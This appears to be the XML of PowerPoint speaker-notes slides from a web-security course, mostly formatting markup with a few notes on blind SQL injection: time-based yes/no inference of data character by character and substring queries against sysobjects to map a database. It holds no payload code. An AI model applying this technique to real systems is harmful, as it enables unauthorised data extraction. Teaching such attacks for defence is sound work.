                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D0D68C"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1300">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310275" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4144963" y="0"/>
            <a:ext cx="3170237" cy="479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5139" tIns="49472" rIns="95139" bIns="49472"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D0D68C"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1300">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310276" name="Text Box 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974725" y="4648200"/>
            <a:ext cx="5364163" cy="4319588"/>
          </a:xfr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lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="3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ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To avoid information leakage and other effects of SQL injection, many developers actively fix SQL injection flaws in their code, providing the best protection.  However, some developers provided us with an exciting challenge, and instead of fixing the bugs properly, they instead relied on blocking or sanitizing SQL error messages.  This led to what are now called "Blind SQL Injection" attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="3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GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="3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ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Database Servers provide a very feature-rich SQL instruction-set.  Comparing results or subsections of results can be completed within the SQL interpreter on the server, prior to returning any results.  Loops, conditions, process control, and more can be accomplished before the web application receives the results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="3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GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="3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ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many database vendors have also "embraced and extended"(R) the language to include even more fun, if in a vendor-specific fashion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="3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GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310277" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311299"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>By repeatedly submitting a SQL query and some comparison text (and behavior based on the comparison), we create a YES/NO condition, indicating whether a specific portion of the results match what we handed in.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For instance, if we send a query which returns a username "asmith," and we tell the database to compare the first byte against the letter "a" (being the first letter in the alphabet)… and then pause a certain timeframe if they match… we can identify whether or not that first letter is  "a".  Since the first attempt matches, we move on.  Repeat the query and have the database compare the second character against "a", then "b", then "c", etc., until we determine the second letter is "s".  Et cetera...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is a very iterative and noisy process, but it can be very powerful for an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312323"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To map out the various fields in the database and retrieve data, we now will play 20 questions.  We ask yes/no questions to gather information.  This process can be quite lengthy.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In the example above, we are using the substring function to return the first letter of the first item in the sysobjects table.  We will then use comparison operators to narrow down to the correct letter.  Then we will use the substring to start looking for the second letter.  Repeating this process, we can retrieve all of the data regarding the schema and the actual data in the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313347"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
